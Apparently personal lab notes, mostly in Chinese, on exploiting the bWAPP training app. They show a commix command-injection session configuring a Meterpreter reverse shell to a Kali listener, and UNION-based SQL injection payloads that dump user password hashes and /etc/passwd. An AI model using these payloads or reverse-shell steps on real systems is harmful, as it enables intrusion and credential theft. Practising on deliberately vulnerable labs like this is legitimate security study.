A1 - Injection

OS Command Injection - Blind

Powershell Injection Attacks using Commix and Magic Unicorn

• 輸入Kali IP(10.0.2.132)，Windows目標機(10.0.2.130)將會送icmp request給本機

  POST /bWAPP/commandi_blind.php HTTP/1.1
  Host: 10.0.2.130
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://10.0.2.130/bWAPP/commandi_blind.php
  Cookie: PHPSESSID=5cct1ln3aqlv7volp52rhnvil5; security_level=0
  DNT: 1
  Connection: close
  Upgrade-Insecure-Requests: 1
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 29
  
  target=10.0.2.132&form=submit
  

• Wiresharek查看封包，目標機確實有送icmp request，而本機也回應了icmp reply

• 使用commix執行command injection：commix --url="http://10.0.2.130/bWAPP/commandi_blind.php" --data="target=10.0.2.132&form=submit" --cookie="PHPSESSID=5cct1ln3aqlv7volp52rhnvil5; security_level=0"

• 接著依續執行

  commix(os_shell) > reverse_tcp
  

  commix(reverse_tcp) > set LHOST 10.0.2.132
  LHOST => 10.0.2.132
  

  commix(reverse_tcp) > set LPORT 4444
  LPORT => 4444
  

    ---[ Reverse TCP shells ]---     
    Type '1' to use a netcat reverse TCP shell.
    Type '2' for other reverse TCP shells.
  
  commix(reverse_tcp) > 2
  

    ---[ Unix-like reverse TCP shells ]---
    Type '1' to use a PHP reverse TCP shell.
    Type '2' to use a Perl reverse TCP shell.
    Type '3' to use a Ruby reverse TCP shell. 
    Type '4' to use a Python reverse TCP shell.
  
    ---[ Meterpreter reverse TCP shells ]---
    Type '5' to use a PHP meterpreter reverse TCP shell.
    Type '6' to use a Python meterpreter reverse TCP shell. 
    Type '7' to use a Windows meterpreter reverse TCP shell. 
    Type '8' to use the web delivery script. 
  
  commix(reverse_tcp_other) > 7
  

    ---[ Powershell injection attacks ]---
    Type '1' to use shellcode injection with native x86 shellcode.
    Type '2' to use TrustedSec's Magic Unicorn.
  
  commix(windows_meterpreter_reverse_tcp) > 2
  

  [*] Generating the 'windows/meterpreter/reverse_tcp' shellcode... [ SUCCEED ]
  [*] Type "msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc" (in a new window).
  [*] Once the loading is done, press here any key to continue...
  [+] Everything is in place, cross your fingers and wait for a shell!
  

  • 此時會產生unicorn.rc

    root@kali:/usr/share/commix/src/thirdparty/unicorn# cat unicorn.rc 
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 10.0.2.132
    set lport 4444
    exploit
    

• 再按下Enter之前，先新開一個terminal執行unicorn.rc，輸入msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc，或在msfconsole底下輸入resource /usr/share/commix/src/thirdparty/unicorn/unicorn.rc

• 按下Enter後失敗，要在win10環境??? 是算是利用什麼的弱點? PowerShell???

  [x] Critical: The reverse TCP connection has failed!
  

SQL Injection (GET/Search)

Low Level

• 輸入單引號(')得到錯誤訊息Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
• 輸入' ORDER BY 3 -- -將結果以第三欄做排序，但結果並無排序，不過也沒發生錯誤，代表欄位是有第三欄的
• 依續測試到' ORDER BY 8 -- -得到Error: Unknown column '8' in 'order clause'，表示最多只有七個欄位而已。
• 查詢database: http://10.0.2.142/bWAPP/sqli_1.php?title=' AND 1=0 UNION ALL SELECT 1,2,database(),4,5,6,7 -- -得到bWAPP
  • 其中AND 1=0表示我們只想得到後面union的結果，前面的就忽略。
• 查詢table name: http://10.0.2.142/bWAPP/sqli_1.php?title=' AND 1=0 UNION ALL SELECT 1,table_schema,table_name,4,5,6,7 FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' -- -得到users
• 查詢column: http://10.0.2.142/bWAPP/sqli_1.php?title=' AND 1=0 UNION ALL SELECT 1,table_name, column_name,4,5,6,7 FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' AND table_schema='bWAPP' AND table_name='users' -- -得到id, login, password等欄位。
• 查詢所有users資訊: http://10.0.2.142/bWAPP/sqli_1.php?title=' AND 1=0 UNION ALL SELECT 1,login,password,secret,email,admin,7 FROM users-- -得到

  A.I.M.     6885858486f31043e5839c735d99457f045affd0     [email protected]     A.I.M. or Authentication Is Missing     Link
  bee     6885858486f31043e5839c735d99457f045affd0     [email protected]     Any bugs?     Link
  

SQL Injection (GET/Select)

Low Level

• http://10.0.2.142/bWAPP/sqli_2.php?movie=2 and 1=0 UNION all SELECT 1,login,password,secret,email,admin,7 FROM users-- -&action=go
• 由於這邊Select的資料回傳只能看見一筆(列)，因此使用LIMIT來指定讀取的資料列：http://10.0.2.142/bWAPP/sqli_2.php?movie=2 and 1=0 UNION all SELECT 1,login,password,secret,email,admin,7 FROM users LIMIT 1,2-- -&action=go
• 或是用id來指定：http://10.0.2.142/bWAPP/sqli_2.php?movie=2 and 1=0 UNION all SELECT 1,login,password,secret,email,admin,7 FROM users WHERE id=2-- -&action=go

SQL Injection (POST/Search)

Low Level

• title=' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;-- &action=search

SQL Injection (POST/Select)

Low Level

• movie=1 UNION ALL SELECT table_schema, table_name, null, null, null, null, null FROM information_schema.tables LIMIT 1 OFFSET 1;--

SQL Injection (Login Form/Hero)

Low Level

• ' or 1=1-- (最後有空格)

SQL Injection (Login Form/User)

Low Level

• ...

SQL Injection (AJAX/JSON/jQuery)

Low Level

• 使用即時搜尋欄位，從source code看來，使用了LIKE模糊查詢，簡單測試搜尋有包含iron或term字樣的movie：(註：LIKE是一種「模糊搜尋」，它必須使用如百分號(％)或底線(＿)合作使用。％代表０個或以上的任意字元。_則是只能有1個字元。)
  • http://10.0.2.142/bWAPP/sqli_10-2.php?title=iron%'+or+title+like+'%term

    [{"0":"2","id":"2",
    "1":"Iron Man","title":"Iron Man",
    "2":"2008","release_year":"2008",
    "3":"action","genre":"action",
    "4":"Tony Stark","main_character":"Tony Stark",
    "5":"tt0371746","imdb":"tt0371746",
    "6":"53","tickets_stock":"53"},
    {"0":"4","id":"4",
    "1":"Terminator Salvation","title":"Terminator Salvation",
    "2":"2009","release_year":"2009",
    "3":"sci-fi","genre":"sci-fi",
    "4":"John Connor","main_character":"John Connor",
    "5":"tt0438488","imdb":"tt0438488",
    "6":"100","tickets_stock":"100"}]
    

• 結果可看到有7個columns，試試查詢版本：
  • http://10.0.2.142/bWAPP/sqli_10-2.php?title=iron%'+union+select+1,version(),3,4,5,6,7+and'%'='
  • 回傳5.0.96-0ubuntu3
• 查詢table name:
  • http://10.0.2.142/bWAPP/sqli_10-2.php?title=iron%'+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--+and'%'='
  • 回傳blog,heroes,movies,users,visitors
• 查詢column name:
  • http://10.0.2.142/bWAPP/sqli_10-2.php?title=iron%'+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name='users'--+and'%'='
  • 回傳id,login,password,email,secret,activation_code,activated,reset_code,admin,uid,name,pass,mail,theme,signature,signature_format,created,access,login,status,timezone,language,picture,init,data
• 查詢/etc/passwd:
  • http://10.0.2.142/bWAPP/sqli_10-2.php?title=iron%'+union+select+1,group_concat(login,0x3a,password),load_file('/etc/passwd'),4,5,6,7+from+users--+and'%'='

    {"0":"1","id":"1",
     "1":"A.I.M.:6885858486f31043e5839c735d99457f045affd0,bee:6885858486f31043e5839c735d99457f045affd0","title":"A.I.M.:6885858486f31043e5839c735d99457f045affd0,bee:6885858486f31043e5839c735d99457f045affd0",
     "2":"root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/bin\/sh\nbin:x:2:2
     ...